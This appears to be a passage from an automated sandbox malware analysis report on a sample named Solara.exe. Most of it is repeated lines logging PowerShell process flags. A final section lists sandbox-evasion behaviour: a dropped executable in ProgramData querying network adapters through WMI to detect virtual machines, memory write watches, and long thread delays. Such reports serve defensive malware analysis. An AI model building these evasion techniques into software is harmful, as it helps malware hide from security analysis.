                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                barindex
                Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                Source: C:\ProgramData\hoyktorfcbbz\rdqanwpudvuj.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
                Source: C:\Users\user\Desktop\Solara.exeMemory allocated: 1FF0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeMemory allocated: 1BC80000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\Solara.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
